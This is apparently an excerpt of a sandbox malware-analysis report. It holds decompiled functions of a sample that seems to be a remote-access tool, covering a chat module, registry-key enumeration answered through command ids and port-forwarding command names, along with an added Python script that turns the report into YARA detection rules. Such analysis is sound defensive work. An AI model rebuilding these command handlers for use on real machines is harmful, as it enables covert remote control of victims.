                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0040D2B5,69D65DF0), ref: 004023A7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023B1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023BA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023C3
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004023D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3745950881-0
                                        • Opcode ID: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction ID: 9121e1d36d2ed1e5780a03bc3f6ba97c1b97061ac4fd9a6be39e0f6b7c1c719d
                                        • Opcode Fuzzy Hash: 44daeea15bb855e80108764f54982e8e04786625b5849f173a8cb93a7b3b47fc
                                        • Instruction Fuzzy Hash: 0451FD7250060EEFCB049FA0DD88CEEBB78FF84355B00806AF916A71A0DB745985CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 34%
                                        			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
                                        				char _v5;
                                        				void* _v12;
                                        				char _v28;
                                        				void* _v44;
                                        				char _v60;
                                        				char _v76;
                                        				char _v92;
                                        				struct tagMSG _v120;
                                        				int _t29;
                                        				void* _t35;
                                        				intOrPtr _t41;
                                        				void* _t45;
                                        				void* _t50;
                                        				void* _t51;
                                        				void* _t62;
                                        				void* _t63;
                                        				intOrPtr _t95;
                                        				void* _t97;
                                        				void* _t101;
                                        				void* _t104;
                                        				void* _t105;
                                        				void* _t107;
                                        
                                        				_t107 = __eflags;
                                        				_t95 = _a4;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
                                        				_t29 = SetEvent( *(_t95 + 0x28));
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t104 = _t101 + 0x24;
                                        				_t97 =  *_t29 - 0x3a;   // first byte of the command string minus ':' (0x3a); the decompiler's _t29 here presumably carries eax after the c_str() call above, not the SetEvent result
                                        				if(_t97 == 0) {   // ':' sub-command: load the chat module and resolve its exports
                                        					_t35 = E0040180C( &_v28, __eflags, 0);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t62 = E00406DD9(_t35);
                                        					__eflags = _t62;
                                        					if(_t62 == 0) {
                                        						L12:
                                        						E004017DD( &_v28);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__eflags = 0;
                                        						return 0;
                                        					}
                                        					 *0x41b794 = E00407033(_t62, "DisplayMessage");   // E00406DD9/E00407033 behave as a loader/GetProcAddress pair: the three chat exports are resolved from module handle _t62 and cached in globals
                                        					 *0x41b798 = E00407033(_t62, "GetMessage");
                                        					_t41 = E00407033(_t62, "CloseChat");
                                        					_t105 = _t104 + 8;
                                        					 *0x41b79c = _t41;
                                        					 *0x41b790 = 1;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        					E004020C2(_t95, 0x74, 0x41b738);
                                        					L10:   // endless poll loop: fetch the next chat message and hand it to E004020C2 under command id 0x3b; as decompiled, a private heap is created on every pass and never destroyed
                                        					_t63 = HeapCreate(0, 0, 0);
                                        					_t45 =  *0x41b798(_t63,  &_v12);   // GetMessage(heap, &buffer)
                                        					__eflags = _t45;
                                        					if(_t45 != 0) {
                                        						_t105 = _t105 - 0x10;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
                                        						E004020C2(_t95, 0x3b, _v12);
                                        						HeapFree(_t63, 0, _v12);
                                        					}
                                        					goto L10;
                                        				}
                                        				_t109 = _t97 != 1;
                                        				if(_t97 != 1) {   // anything other than ';' (0x3b) is ignored and the function cleans up
                                        					goto L12;
                                        				}
                                        				_t50 = E00412881( &_v92);   // narrow-to-wide conversion of the message text (see its ??0?$basic_string@GU... sub-calls below)
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
                                        				_t51 =  *0x41b794(_t50);   // ';' sub-command: DisplayMessage(wide text) through the cached export
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_t51 == 0) {
                                        					goto L12;
                                        				}
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
                                        				E00412855( &_v60, _t104 - 0x10,  &_v60);
                                        				E004020C2(_t95, 0x3b, 0x41576c);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				L4:   // standard Win32 message pump; GetMessageA returns 0 on WM_QUIT and -1 on error, which the decompiled __eflags test separates
                                        				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                        					if(__eflags >= 0) {
                                        						goto L12;
                                        					}
                                        				}
                                        				TranslateMessage( &_v120);
                                        				DispatchMessageA( &_v120);
                                        				goto L4;
                                        			}
                                        Address gutter of the listing above (one entry per decompiled statement; 0x00000000 where a line has no instruction of its own, such as gotos and closing braces). The statements span 0x0040295E to 0x00402B53.

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                        • SetEvent.KERNEL32(?), ref: 0040297A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040299B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                        • GetMessageA.USER32 ref: 00402A52
                                        • TranslateMessage.USER32(?), ref: 00402A60
                                        • DispatchMessageA.USER32 ref: 00402A6A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                        • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 1701728818-749203953
                                        • Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                        • Opcode Fuzzy Hash: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%
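The function entries above are rendered as an "APIs" call list (one mangled import per line with its call-site address) plus a "Similarity" block whose String ID joins the function's string references with "$". The following Python is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses such entries into records, roughly demangles the MSVCP60 imports so the call lists become readable, and emits a string-based YARA rule per entry (for instance from CloseChat / DisplayMessage / GetMessage). The report excerpt embedded in it is a constructed, shortened copy of entries on this page; the rule naming and the small demangling table are the example's own assumptions.

```python
"""Parse Joe Sandbox function entries (the "APIs" / "Similarity" fields shown in the
report above) into records and derive string-based YARA rules from them. Added example,
not part of the report or of the sample: REPORT_EXCERPT is a constructed, shortened copy
of entries above and the demangling table is the example's own."""
import re
from collections import Counter
from dataclasses import dataclass, field

REPORT_EXCERPT = """\
APIs
• ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
Similarity
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• Opcode ID: f3929fae1f8e497e51fb93d2ade4ea54b572ef24a6e630ee0c1868d71aa5104e
• Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
APIs
• SetEvent.KERNEL32(?), ref: 0040297A
  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
• GetMessageA.USER32 ref: 00402A52
Similarity
• String ID: CloseChat$DisplayMessage$GetMessage
• Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Yara matches", "Similarity", "Uniqueness"}
API_RE = re.compile(r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
                    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<addr>[0-9A-F]{8})$")
OPERATOR_CODES = {"0": "ctor", "1": "dtor", "2": "operator new", "3": "operator delete",
                  "4": "operator=", "8": "operator==", "9": "operator!=", "H": "operator+"}  # MSVC ?? codes seen above

@dataclass
class ApiRef:
    name: str
    module: str
    addr: str          # call-site address (the "ref:" field)
    subcall: str = ""  # sub-function address when the report nests the call under one

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: str = ""
    fuzzy_hash: str = ""

def parse_report(text):
    """One FunctionBlock per 'APIs' section; the report's own headers delimit the fields."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if line == "APIs":                  # every function entry opens with its API list
                blocks.append(current := FunctionBlock())
            section = line
        elif current is not None and line.startswith("•"):
            if section == "APIs":
                if m := API_RE.match(line):
                    current.apis.append(ApiRef(m["name"], m["module"], m["addr"], m["sub"] or ""))
            elif section == "Similarity":
                key, _, value = (p.strip() for p in line[1:].partition(":"))
                if key == "String ID":          # Joe Sandbox joins the strings with '$'
                    current.strings = [s for s in value.split("$") if s]
                elif key == "Opcode ID":
                    current.opcode_id = value
                elif key == "Instruction Fuzzy Hash":
                    current.fuzzy_hash = value
    return blocks

def _scope(rest):
    # "?$basic_string@..." is a template class, "std@@..." a namespace, "@YA..." has none
    return (rest[2:] if rest.startswith("?$") else rest).split("@", 1)[0]

def short_name(mangled):
    """Reduce an MSVC-mangled import to scope::member; plain Win32 exports pass through."""
    if mangled.startswith("??") and len(mangled) > 2:
        member, scope = OPERATOR_CODES.get(mangled[2], "operator?" + mangled[2]), _scope(mangled[3:])
    elif mangled.startswith("?"):
        member, _, rest = mangled[1:].partition("@")
        scope = _scope(rest)
    else:
        return mangled
    return f"{scope}::{member}" if scope else member

def yara_rule(block, name):
    """String-based rule for one function entry, or None when the entry carries no strings."""
    if not block.strings:
        return None
    out = [f"rule {name}", "{", "    meta:", f'        opcode_id = "{block.opcode_id}"', "    strings:"]
    for i, s in enumerate(block.strings):
        esc = s.replace("\\", "\\\\").replace('"', '\\"')
        out.append(f'        $s{i} = "{esc}" ascii wide')
    out += ["    condition:", "        uint16(0) == 0x5A4D and all of ($s*)", "}"]
    return "\n".join(out)

def api_summary(blocks, include_subcalls=False):
    """Count readable API names over all entries, keyed like 'KERNEL32!SetEvent'."""
    counts = Counter()
    for b in blocks:
        for a in b.apis:
            if not a.subcall or include_subcalls:
                counts[f"{a.module}!{short_name(a.name)}"] += 1
    return counts
```

Feed `parse_report` the text of a saved report page instead of the excerpt to get one record per function. The generated condition requires every string of the entry; loosen it (for example to `2 of ($s*)`) if the strings drift between builds, and keep the Opcode ID in `meta` so a hit can be traced back to the exact entry and its Instruction Fuzzy Hash.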

                                        C-Code - Quality: 34%
                                        			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                        				void* _v8;
                                        				char _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char _v72;
                                        				char _v88;
                                        				char _v104;
                                        				char _v120;
                                        				char _v136;
                                        				char _v152;
                                        				void* _t28;
                                        				long _t29;
                                        				void* _t35;
                                        				char* _t38;
                                        				char* _t39;
                                        				char* _t40;
                                        				char* _t41;
                                        				char* _t42;
                                        				char* _t43;
                                        				char* _t44;
                                        				void* _t54;
                                        				void* _t56;
                                        				char* _t73;
                                        				void* _t77;
                                        				void* _t79;
                                        
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				_t28 = E0040BD9B( &_a4);
                                        				_t79 = _t77 - 0x10 + 0x10;
                                        				_t47 = 0;
                                        				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);   // 0x20019 == KEY_READ; _a20 is the requested sub-key as a wide string
                                        				_t90 = _t29;
                                        				if(_t29 != 0) {   // open failed: the literal "3" is passed to E004020C2 under command id 0x72
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        					E004020C2(0x41bde0, 0x72, "3");
                                        				} else {
                                        					E0040BB20( &_v8, _t90, _v8);   // walks the opened key; its output feeds the response assembled from the string temporaries below
                                        					_pop(_t54);
                                        					_t73 = "0";
                                        					if(_a24 != 0) {
                                        						_t73 = "1";
                                        					}
                                        					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
                                        					_t56 = 0x41b310;
                                        					_t38 =  &_v88;
                                        					L00414176();
                                        					_t39 =  &_v56;
                                        					L00414140();
                                        					_t40 =  &_v40;
                                        					L00414140();
                                        					_t41 =  &_v24;
                                        					L00414140();
                                        					_t42 =  &_v72;
                                        					L00414140();
                                        					_t43 =  &_v104;
                                        					L00414140();
                                        					_t44 =  &_v136;
                                        					L00414140();
                                        					L00414140();
                                        					E004020C2(0x41bde0, 0x71, _t79 - 0x10);   // success: the assembled listing is passed on under command id 0x71
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        					RegCloseKey(_v8);
                                        					_t47 = 1;   // return value: 1 on success, 0 when the key could not be opened
                                        				}
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t47;
                                        			}

                                        Disassembly listing (instruction text not captured in extraction; addresses 0x0040be49 to 0x0040c00b)

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                          • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                          • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                        • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                          • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                          • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
